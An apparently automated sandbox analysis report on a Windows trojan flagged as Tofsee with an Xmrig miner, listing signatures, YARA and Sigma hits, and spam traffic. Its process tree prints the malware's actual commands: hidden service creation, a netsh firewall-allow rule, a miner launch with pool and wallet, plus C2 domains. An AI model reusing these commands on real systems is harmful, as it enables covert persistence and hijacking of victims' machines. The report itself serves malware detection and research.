Play interactive tour

Edit tour

Windows Analysis Report HsWJJz7nq4

Overview

General Information

Sample Name:	HsWJJz7nq4 (renamed file extension from none to exe)
Analysis ID:	477980
MD5:	8b7286786c1f017e5002e0ba66bfae58
SHA1:	1b1ab73d9e8bae1f39a897805af00df1d52b3847
SHA256:	b29336af96fb97eae18de7b3655762c9cbcd5c2f0257a43cd4c66cbb864ac79b
Tags:	32exetrojan
Infos:
Most interesting Screenshot:

Detection

Tofsee Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Detected unpacking (changes PE section rights)

Antivirus detection for dropped file

Sigma detected: Suspect Svchost Activity

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected Xmrig cryptocurrency miner

Malicious sample detected (through community Yara rule)

Yara detected Tofsee

Sigma detected: Xmrig

Sigma detected: Copying Sensitive Files with Credential Data

Uses netsh to modify the Windows network and firewall settings

Found strings related to Crypto-Mining

Detected Stratum mining protocol

Machine Learning detection for sample

Allocates memory in foreign processes

Performs DNS queries to domains with low reputation

Injects a PE file into a foreign processes

Send many emails (e-Mail Spam)

Sigma detected: Suspicious Svchost Process

Deletes itself after installation

Drops executables to the windows directory (C:\Windows) and starts them

Writes to foreign memory regions

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Modifies the windows firewall

Creates files in alternative data streams (ADS)

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Detected potential crypto function

Contains functionality to launch a process as a different user

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to dynamically determine API calls

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Modifies existing windows services

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

Sigma detected: Netsh Port or Application Allowed

Creates a process in suspended mode (likely to inject code)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Creates files inside the system directory

Internet Provider seen in connection with other malware

Stores large binary data to the registry

Found potential string decryption / allocating functions

Contains functionality to communicate with device drivers

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Connects to many different domains

PE file contains an invalid checksum

Extensive use of GetProcAddress (often used to hide API calls)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Detected TCP or UDP traffic on non-standard ports

Connects to several IPs in different countries

Uses SMTP (mail sending)

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Classification

Process Tree

System is w10x64

HsWJJz7nq4.exe (PID: 5588 cmdline: 'C:\Users\user\Desktop\HsWJJz7nq4.exe' MD5: 8B7286786C1F017E5002E0BA66BFAE58)

cmd.exe (PID: 3000 cmdline: 'C:\Windows\System32\cmd.exe' /C mkdir C:\Windows\SysWOW64\mmeemcze\ MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 4112 cmdline: 'C:\Windows\System32\cmd.exe' /C move /Y 'C:\Users\user\AppData\Local\Temp\kwrovuui.exe' C:\Windows\SysWOW64\mmeemcze\ MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 7072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

sc.exe (PID: 4244 cmdline: 'C:\Windows\System32\sc.exe' create mmeemcze binPath= 'C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe /d\'C:\Users\user\Desktop\HsWJJz7nq4.exe\'' type= own start= auto DisplayName= 'wifi support' MD5: 24A3E2603E63BCB9695A2935D3B24695)

conhost.exe (PID: 6856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

sc.exe (PID: 4260 cmdline: 'C:\Windows\System32\sc.exe' description mmeemcze 'wifi internet conection' MD5: 24A3E2603E63BCB9695A2935D3B24695)

conhost.exe (PID: 6868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

sc.exe (PID: 984 cmdline: 'C:\Windows\System32\sc.exe' start mmeemcze MD5: 24A3E2603E63BCB9695A2935D3B24695)

conhost.exe (PID: 3408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

netsh.exe (PID: 740 cmdline: 'C:\Windows\System32\netsh.exe' advfirewall firewall add rule name='Host-process for services of Windows' dir=in action=allow program='C:\Windows\SysWOW64\svchost.exe' enable=yes>nul MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)

conhost.exe (PID: 5744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

kwrovuui.exe (PID: 5672 cmdline: C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe /d'C:\Users\user\Desktop\HsWJJz7nq4.exe' MD5: 8A7DE3BAB4AD35E52859C6BCEF5640A7)

svchost.exe (PID: 6076 cmdline: svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)

svchost.exe (PID: 5308 cmdline: svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half MD5: FA6C268A5B5BDA067A901764D203D433)

conhost.exe (PID: 4420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

svchost.exe (PID: 6612 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

Threatname: Tofsee

{"C2 list": ["defeatwax.ru:443", "refabyd.info:443"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
0000000E.00000002.665871062.0000000002230000.00000004.00000001.sdmp	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
0000000E.00000003.664485787.0000000002180000.00000004.00000001.sdmp	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
00000012.00000003.679847129.000000000AC00000.00000004.00000001.sdmp	XMRIG_Monero_Miner	Detects Monero mining software	Florian Roth	0xd88be:$s2: --cpu-affinity set process affinity to CPU core(s), mask 0x3 for cores 0 and 1 0xd85d6:$s3: -p, --pass=PASSWORD password for mining server
00000012.00000003.679847129.000000000AC00000.00000004.00000001.sdmp	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0xda41d:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume 0xd9d08:$s1: [%s] login error code: %d
00000012.00000003.679847129.000000000AC00000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000012.00000003.679847129.000000000AC00000.00000004.00000001.sdmp	MINER_monero_mining_detection	Monero mining software	Christiaan Beek \| McAfee ATR Team	0xd88be:$2: --cpu-affinity set process affinity to CPU core(s), mask 0x3 for cores 0 and 1 0xd8a52:$4: --user-agent set custom user-agent string for pool 0xd855c:$5: -O, --userpass=U:P username:password pair for mining server 0xd8919:$6: --cpu-priority set process priority (0 idle, 2 normal to 5 highest) 0xd85d6:$7: -p, --pass=PASSWORD password for mining server 0xd8b43:$10: --max-cpu-usage=N maximum CPU usage for automatic threads mode (default 75) 0xd8814:$14: -r, --retries=N number of times to retry before switch to backup server (default: 5) 0xd8a8f:$15: -B, --background run the miner in the background 0xd8cbe:$17: --api-access-token=T access token for API 0xd8664:$18: -t, --threads=N number of miner threads 0xd8c4b:$19: --print-time=N print hashrate report every N seconds 0xd85a0:$20: -u, --user=USERNAME username for mining server
00000012.00000003.679731110.000000000AF00000.00000004.00000001.sdmp	XMRIG_Monero_Miner	Detects Monero mining software	Florian Roth	0xd9cbe:$s2: --cpu-affinity set process affinity to CPU core(s), mask 0x3 for cores 0 and 1 0xd99d6:$s3: -p, --pass=PASSWORD password for mining server
00000012.00000003.679731110.000000000AF00000.00000004.00000001.sdmp	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0xdb81d:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume 0xdb108:$s1: [%s] login error code: %d
00000012.00000003.679731110.000000000AF00000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000012.00000003.679731110.000000000AF00000.00000004.00000001.sdmp	MINER_monero_mining_detection	Monero mining software	Christiaan Beek \| McAfee ATR Team	0xd9cbe:$2: --cpu-affinity set process affinity to CPU core(s), mask 0x3 for cores 0 and 1 0xd9e52:$4: --user-agent set custom user-agent string for pool 0xd995c:$5: -O, --userpass=U:P username:password pair for mining server 0xd9d19:$6: --cpu-priority set process priority (0 idle, 2 normal to 5 highest) 0xd99d6:$7: -p, --pass=PASSWORD password for mining server 0xd9f43:$10: --max-cpu-usage=N maximum CPU usage for automatic threads mode (default 75) 0xd9c14:$14: -r, --retries=N number of times to retry before switch to backup server (default: 5) 0xd9e8f:$15: -B, --background run the miner in the background 0xda0be:$17: --api-access-token=T access token for API 0xd9a64:$18: -t, --threads=N number of miner threads 0xda04b:$19: --print-time=N print hashrate report every N seconds 0xd99a0:$20: -u, --user=USERNAME username for mining server
00000000.00000003.643630802.0000000002250000.00000004.00000001.sdmp	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
Process Memory Space: HsWJJz7nq4.exe PID: 5588	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
Process Memory Space: kwrovuui.exe PID: 5672	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
Process Memory Space: svchost.exe PID: 6076	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.HsWJJz7nq4.exe.2230e50.1.raw.unpack	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
14.2.kwrovuui.exe.400000.0.unpack	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
14.3.kwrovuui.exe.2180000.0.raw.unpack	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
14.2.kwrovuui.exe.2230000.2.raw.unpack	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
14.2.kwrovuui.exe.400000.0.raw.unpack	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
0.3.HsWJJz7nq4.exe.2250000.0.raw.unpack	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
0.2.HsWJJz7nq4.exe.400000.0.unpack	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
14.2.kwrovuui.exe.2230000.2.unpack	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
14.2.kwrovuui.exe.2160e50.1.raw.unpack	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
0.2.HsWJJz7nq4.exe.400000.0.raw.unpack	JoeSecurity_Tofsee	Yara detected Tofsee	Joe Security
18.3.svchost.exe.af00000.2.raw.unpack	XMRIG_Monero_Miner	Detects Monero mining software	Florian Roth	0xd9cbe:$s2: --cpu-affinity set process affinity to CPU core(s), mask 0x3 for cores 0 and 1 0xd99d6:$s3: -p, --pass=PASSWORD password for mining server
18.3.svchost.exe.af00000.2.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0xdb81d:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume 0xdb108:$s1: [%s] login error code: %d
18.3.svchost.exe.af00000.2.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
18.3.svchost.exe.af00000.2.raw.unpack	MINER_monero_mining_detection	Monero mining software	Christiaan Beek \| McAfee ATR Team	0xd9cbe:$2: --cpu-affinity set process affinity to CPU core(s), mask 0x3 for cores 0 and 1 0xd9e52:$4: --user-agent set custom user-agent string for pool 0xd995c:$5: -O, --userpass=U:P username:password pair for mining server 0xd9d19:$6: --cpu-priority set process priority (0 idle, 2 normal to 5 highest) 0xd99d6:$7: -p, --pass=PASSWORD password for mining server 0xd9f43:$10: --max-cpu-usage=N maximum CPU usage for automatic threads mode (default 75) 0xd9c14:$14: -r, --retries=N number of times to retry before switch to backup server (default: 5) 0xd9e8f:$15: -B, --background run the miner in the background 0xda0be:$17: --api-access-token=T access token for API 0xd9a64:$18: -t, --threads=N number of miner threads 0xda04b:$19: --print-time=N print hashrate report every N seconds 0xd99a0:$20: -u, --user=USERNAME username for mining server
18.3.svchost.exe.af00000.2.unpack	XMRIG_Monero_Miner	Detects Monero mining software	Florian Roth	0xd88be:$s2: --cpu-affinity set process affinity to CPU core(s), mask 0x3 for cores 0 and 1 0xd85d6:$s3: -p, --pass=PASSWORD password for mining server
18.3.svchost.exe.af00000.2.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0xda41d:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume 0xd9d08:$s1: [%s] login error code: %d
18.3.svchost.exe.af00000.2.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
18.3.svchost.exe.af00000.2.unpack	MINER_monero_mining_detection	Monero mining software	Christiaan Beek \| McAfee ATR Team	0xd88be:$2: --cpu-affinity set process affinity to CPU core(s), mask 0x3 for cores 0 and 1 0xd8a52:$4: --user-agent set custom user-agent string for pool 0xd855c:$5: -O, --userpass=U:P username:password pair for mining server 0xd8919:$6: --cpu-priority set process priority (0 idle, 2 normal to 5 highest) 0xd85d6:$7: -p, --pass=PASSWORD password for mining server 0xd8b43:$10: --max-cpu-usage=N maximum CPU usage for automatic threads mode (default 75) 0xd8814:$14: -r, --retries=N number of times to retry before switch to backup server (default: 5) 0xd8a8f:$15: -B, --background run the miner in the background 0xd8cbe:$17: --api-access-token=T access token for API 0xd8664:$18: -t, --threads=N number of miner threads 0xd8c4b:$19: --print-time=N print hashrate report every N seconds 0xd85a0:$20: -u, --user=USERNAME username for mining server
18.3.svchost.exe.ac00000.3.raw.unpack	XMRIG_Monero_Miner	Detects Monero mining software	Florian Roth	0xd88be:$s2: --cpu-affinity set process affinity to CPU core(s), mask 0x3 for cores 0 and 1 0xd85d6:$s3: -p, --pass=PASSWORD password for mining server
18.3.svchost.exe.ac00000.3.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0xda41d:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume 0xd9d08:$s1: [%s] login error code: %d
18.3.svchost.exe.ac00000.3.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
18.3.svchost.exe.ac00000.3.raw.unpack	MINER_monero_mining_detection	Monero mining software	Christiaan Beek \| McAfee ATR Team	0xd88be:$2: --cpu-affinity set process affinity to CPU core(s), mask 0x3 for cores 0 and 1 0xd8a52:$4: --user-agent set custom user-agent string for pool 0xd855c:$5: -O, --userpass=U:P username:password pair for mining server 0xd8919:$6: --cpu-priority set process priority (0 idle, 2 normal to 5 highest) 0xd85d6:$7: -p, --pass=PASSWORD password for mining server 0xd8b43:$10: --max-cpu-usage=N maximum CPU usage for automatic threads mode (default 75) 0xd8814:$14: -r, --retries=N number of times to retry before switch to backup server (default: 5) 0xd8a8f:$15: -B, --background run the miner in the background 0xd8cbe:$17: --api-access-token=T access token for API 0xd8664:$18: -t, --threads=N number of miner threads 0xd8c4b:$19: --print-time=N print hashrate report every N seconds 0xd85a0:$20: -u, --user=USERNAME username for mining server
18.3.svchost.exe.ac00000.3.unpack	XMRIG_Monero_Miner	Detects Monero mining software	Florian Roth	0xd74be:$s2: --cpu-affinity set process affinity to CPU core(s), mask 0x3 for cores 0 and 1 0xd71d6:$s3: -p, --pass=PASSWORD password for mining server
18.3.svchost.exe.ac00000.3.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0xd901d:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume 0xd8908:$s1: [%s] login error code: %d
18.3.svchost.exe.ac00000.3.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
18.3.svchost.exe.ac00000.3.unpack	MINER_monero_mining_detection	Monero mining software	Christiaan Beek \| McAfee ATR Team	0xd74be:$2: --cpu-affinity set process affinity to CPU core(s), mask 0x3 for cores 0 and 1 0xd7652:$4: --user-agent set custom user-agent string for pool 0xd715c:$5: -O, --userpass=U:P username:password pair for mining server 0xd7519:$6: --cpu-priority set process priority (0 idle, 2 normal to 5 highest) 0xd71d6:$7: -p, --pass=PASSWORD password for mining server 0xd7743:$10: --max-cpu-usage=N maximum CPU usage for automatic threads mode (default 75) 0xd7414:$14: -r, --retries=N number of times to retry before switch to backup server (default: 5) 0xd768f:$15: -B, --background run the miner in the background 0xd78be:$17: --api-access-token=T access token for API 0xd7264:$18: -t, --threads=N number of miner threads 0xd784b:$19: --print-time=N print hashrate report every N seconds 0xd71a0:$20: -u, --user=USERNAME username for mining server
Click to see the 21 entries

Sigma Overview

Bitcoin Miner:

Sigma detected: Xmrig

Show sources

Source: Process started

Author: Joe Security: Data: Command: svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half, CommandLine: svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: svchost.exe, ParentImage: C:\Windows\SysWOW64\svchost.exe, ParentProcessId: 6076, ProcessCommandLine: svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half, ProcessId: 5308

System Summary:

Sigma detected: Suspect Svchost Activity

Show sources

Source: Process started

Author: David Burkett: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe /d'C:\Users\user\Desktop\HsWJJz7nq4.exe', ParentImage: C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe, ParentProcessId: 5672, ProcessCommandLine: svchost.exe, ProcessId: 6076

Sigma detected: Copying Sensitive Files with Credential Data

Show sources

Source: Process started

Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community: Data: Command: 'C:\Windows\System32\cmd.exe' /C move /Y 'C:\Users\user\AppData\Local\Temp\kwrovuui.exe' C:\Windows\SysWOW64\mmeemcze\, CommandLine: 'C:\Windows\System32\cmd.exe' /C move /Y 'C:\Users\user\AppData\Local\Temp\kwrovuui.exe' C:\Windows\SysWOW64\mmeemcze\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: 'C:\Users\user\Desktop\HsWJJz7nq4.exe' , ParentImage: C:\Users\user\Desktop\HsWJJz7nq4.exe, ParentProcessId: 5588, ProcessCommandLine: 'C:\Windows\System32\cmd.exe' /C move /Y 'C:\Users\user\AppData\Local\Temp\kwrovuui.exe' C:\Windows\SysWOW64\mmeemcze\, ProcessId: 4112

Sigma detected: Suspicious Svchost Process

Show sources

Source: Process started

Author: Florian Roth: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe /d'C:\Users\user\Desktop\HsWJJz7nq4.exe', ParentImage: C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe, ParentProcessId: 5672, ProcessCommandLine: svchost.exe, ProcessId: 6076

Sigma detected: Netsh Port or Application Allowed

Show sources

Source: Process started

Author: Markus Neis, Sander Wiebing: Data: Command: 'C:\Windows\System32\netsh.exe' advfirewall firewall add rule name='Host-process for services of Windows' dir=in action=allow program='C:\Windows\SysWOW64\svchost.exe' enable=yes>nul, CommandLine: 'C:\Windows\System32\netsh.exe' advfirewall firewall add rule name='Host-process for services of Windows' dir=in action=allow program='C:\Windows\SysWOW64\svchost.exe' enable=yes>nul, CommandLine|base64offset|contains: ijY, Image: C:\Windows\SysWOW64\netsh.exe, NewProcessName: C:\Windows\SysWOW64\netsh.exe, OriginalFileName: C:\Windows\SysWOW64\netsh.exe, ParentCommandLine: 'C:\Users\user\Desktop\HsWJJz7nq4.exe' , ParentImage: C:\Users\user\Desktop\HsWJJz7nq4.exe, ParentProcessId: 5588, ProcessCommandLine: 'C:\Windows\System32\netsh.exe' advfirewall firewall add rule name='Host-process for services of Windows' dir=in action=allow program='C:\Windows\SysWOW64\svchost.exe' enable=yes>nul, ProcessId: 740

Sigma detected: New Service Creation

Show sources

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: 'C:\Windows\System32\sc.exe' create mmeemcze binPath= 'C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe /d\'C:\Users\user\Desktop\HsWJJz7nq4.exe\'' type= own start= auto DisplayName= 'wifi support', CommandLine: 'C:\Windows\System32\sc.exe' create mmeemcze binPath= 'C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe /d\'C:\Users\user\Desktop\HsWJJz7nq4.exe\'' type= own start= auto DisplayName= 'wifi support', CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: 'C:\Users\user\Desktop\HsWJJz7nq4.exe' , ParentImage: C:\Users\user\Desktop\HsWJJz7nq4.exe, ParentProcessId: 5588, ProcessCommandLine: 'C:\Windows\System32\sc.exe' create mmeemcze binPath= 'C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe /d\'C:\Users\user\Desktop\HsWJJz7nq4.exe\'' type= own start= auto DisplayName= 'wifi support', ProcessId: 4244

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\kwrovuui.exe

Avira: detection malicious, Label: TR/ATRAPS.Gen2

Found malware configuration

Show sources

Source: 14.3.kwrovuui.exe.2180000.0.raw.unpack

Malware Configuration Extractor: Tofsee {"C2 list": ["defeatwax.ru:443", "refabyd.info:443"]}

Multi AV Scanner detection for submitted file

Show sources

Source: HsWJJz7nq4.exe	Virustotal: Detection: 31%			Perma Link
Source: HsWJJz7nq4.exe	ReversingLabs: Detection: 32%

Machine Learning detection for sample

Show sources

Source: HsWJJz7nq4.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\kwrovuui.exe

Joe Sandbox ML: detected

Source: 14.2.kwrovuui.exe.400000.0.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 18.3.svchost.exe.af00000.2.unpack	Avira: Label: TR/Crypt.XPACK.Gen8
Source: 14.3.kwrovuui.exe.2180000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.HsWJJz7nq4.exe.2230e50.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.HsWJJz7nq4.exe.2250000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.HsWJJz7nq4.exe.400000.0.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 14.2.kwrovuui.exe.2230000.2.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 14.2.kwrovuui.exe.2160e50.1.unpack	Avira: Label: TR/Patched.Ren.Gen

Bitcoin Miner:

Yara detected Xmrig cryptocurrency miner

Show sources

Source: Yara match	File source: 18.3.svchost.exe.af00000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.3.svchost.exe.af00000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.3.svchost.exe.ac00000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.3.svchost.exe.ac00000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000003.679847129.000000000AC00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.679731110.000000000AF00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 6076, type: MEMORYSTR

Found strings related to Crypto-Mining

Show sources

Source: svchost.exe, 00000012.00000003.679847129.000000000AC00000.00000004.00000001.sdmp	String found in binary or memory: stratum+tcp://
Source: svchost.exe, 00000012.00000003.679847129.000000000AC00000.00000004.00000001.sdmp	String found in binary or memory: cryptonight
Source: svchost.exe, 00000012.00000003.679847129.000000000AC00000.00000004.00000001.sdmp	String found in binary or memory: -o, --url=URL URL of mining server
Source: svchost.exe, 00000012.00000003.679847129.000000000AC00000.00000004.00000001.sdmp	String found in binary or memory: stratum+tcp://

Detected Stratum mining protocol

Show sources

Source: global traffic

TCP traffic: 192.168.2.4:49744 -> 213.91.128.133:10060 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"9rlbtvsapfs3i3ojk5hdkicmnrqbxxfgwja2hnc6nozzdqn5ttfbhvifm4w3koxsrpg87lnif7qxfyh9xptjz1ct6b17ph4.50000","pass":"x","agent":"a/1.00.0 (windows nt 10.0) libuv/1.23.0 msvc/2017","algo":["cn/half","cn/2","cn/1","cn/0","cn/xtl","cn/msr","cn/xao","cn/rto","cn"]}}.

Source: HsWJJz7nq4.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\HsWJJz7nq4.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source:	Binary string: C:\lejasumefelaw\bahonifapenaho\heciyow\wo.pdb source: HsWJJz7nq4.exe
Source:	Binary string: PC:\lejasumefelaw\bahonifapenaho\heciyow\wo.pdb source: HsWJJz7nq4.exe

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.8.33:25 -> 192.168.2.4:49738
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 108.177.119.27:25 -> 192.168.2.4:49735
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:49737
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.57.161:25 -> 192.168.2.4:49756
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:49760
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.58.33:25 -> 192.168.2.4:49781
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:49769
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:49803
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:49808
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 77.75.76.42:25 -> 192.168.2.4:49823
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 108.177.119.26:25 -> 192.168.2.4:49898
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.66.33:25 -> 192.168.2.4:49910
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 108.177.119.27:25 -> 192.168.2.4:49973
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:49987
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 108.177.119.27:25 -> 192.168.2.4:49991
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 108.177.119.26:25 -> 192.168.2.4:50003
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50036
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50047
